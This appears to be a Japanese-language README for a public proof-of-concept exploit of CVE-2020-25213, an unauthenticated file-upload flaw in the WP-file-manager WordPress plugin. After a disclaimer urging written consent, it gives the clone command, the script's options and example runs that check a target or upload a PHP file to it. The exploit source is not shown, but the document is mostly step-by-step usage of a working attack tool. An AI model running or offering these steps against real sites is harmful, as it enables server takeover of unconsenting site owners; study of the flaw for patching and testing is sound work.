
https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8
WP-file-manager WordPress プラグイン(<6.9)は、認証されていない任意のファイルアップロードに対して脆弱であり、システム全体が侵害される可能性があります。
詳細については、こちら に公開した私の記事を参照してください。
私はこの脆弱性を発見したわけではなく、このCVEの功績を主張するものでもありません。私は、wordfence や seravo などのさまざまなブログで公開されている説明を分析してエクスプロイトを作成しただけであり、その目的は、読者が脆弱性の説明を分析するだけでPOCを作成する方法を理解できるようにすることです。
このエクスプロイトを使用して組織に損害が生じた場合、私は一切の責任を負いません。また、読者の皆様には、組織の書面による同意なしにこの脆弱性を悪用しないようお勧めします。悪用すると、組織が他のハッカーによる攻撃にさらされる可能性があります。
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh
-u|--wp_url Wordpress target url
-f|--upload_file Absolute location of local file to upload on the target.
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
